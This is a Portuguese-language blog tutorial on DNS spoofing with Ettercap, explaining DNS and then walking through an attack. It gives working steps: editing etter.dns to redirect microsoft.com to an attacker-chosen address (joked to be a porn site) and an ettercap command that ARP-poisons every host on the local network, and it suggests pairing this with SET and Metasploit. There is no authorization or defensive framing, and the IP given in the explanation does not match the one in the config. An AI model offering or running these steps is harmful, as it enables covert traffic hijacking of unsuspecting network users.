Spoofing pelo Ettercap
Veja como aplicar a técnica de spoofing usando o aplicativo Ettercap em DNS, técnica semelhante ao IP Spoffing pelo Nmap no artigo anterior.
O que é DNS?
O DNS (Domain Name System - Sistema de Nomes de Domínios) é um sistema de gerenciamento de nomes hierárquico e distribuído operando segundo duas definições:
Examinar e atualizar seu banco de dados.
Resolver nomes de domínios em endereços de rede (IPs).
Para ficar mais fácil o entendimento, o dns transforma o endereço numérico de um site em algum endereço (domínio), deu pra entender? Por exemplo o google.com.br tem o IP: 74.125.229.115, imagina então se toda vez que a gente fosse entrar no google.com.br, tivesse que digitar o endereço (74.125.229.115), ficaria complicado decorar seus sites na cabeça né? Então foi criado o protocolo "dns", que converte esses números em um endereço (domínio).
O que é DNS Spoofing?
Dns Spoofing é uma técnica que utilizamos pra que todas as pessoas de uma determinada rede que consultar um servidor DNS (domínio), seja redirecionada para onde quisermos. Por exemplo, vamos imaginar que uma pessoa queira visitar o site "www.microsoft.com", utilizando a técnica "Dns Spoofing" podemos redirecioná-la para onde quisermos. Que tal um site porno? rs.
Ferramentas
Para quem usa sistemas baseados em Debian, vamos rodar o comando no terminal:
$ sudo apt-get install ettercap
Ou para quem usa o Windows, basta fazer o download e instalar o aplicativo no endereço http://sourceforge.net/projects/ettercap/files/unofficial20binaries/windows/ em outras distribuições linux, basta fazer o download do pacote em http://ettercap.sourceforge.net/download.php.
Ataque
Antes de inciarmos o ataque propriamente dito, vamos editar o arquivo "etter.dns" onde vamos adicionar o nosso site alvo. Basta abrir o arquivo com qualquer editor de texto de sua preferência(vim, vi, nano) etc.
$ nano /usr/share/ettercap/etter.dns
Adicione lá embaixo o endereço do site alvo e do site redirecionado na forma a seguir:
microsoft.com A 69.55.59.132
www.microsoft.com A 69.55.59.132
Onde:
=> microsft.com: O nosso site alvo
=> A: Tipo de redirecionamento
=> 62.55.59.132: IP de um site pornográfico (muito bom por sinal)
Abra um terminal e digite o comando a seguir:
$ ettercap -T -q -M arp -i eth0 -P dns_spoof //
Onde:
=> ettercap: Programa usado
=> -T: Para entrar em modo texto
=> -q: Modo silencioso
=> -M arp: Tipo de redirecionamento
=> -i eth0: Nossa placa de rede (não é necessário)
=> -P dns_spoof: Plugin necessário
=> //: Toda a rede
Então quando a vítima for entrar no site da Microsoft, será redirecionada para o site pornográfico...
O plugin avisa que o site alvo foi spoofado com sucesso.
Finalizando
Esta tecnica pode ser bastante útil quando trabalhada com outras ferramentas (SET, Metasploit), podendo ser uma ótima escolha de ataque, pena que só podemos realizar o dns_spoofing em rede local.
Para complementar, segue ai uma vídeo aula: http://youtu.be/6sc1eHFNPj8 é muita moleza né?
Por Jarlley Ribeiro.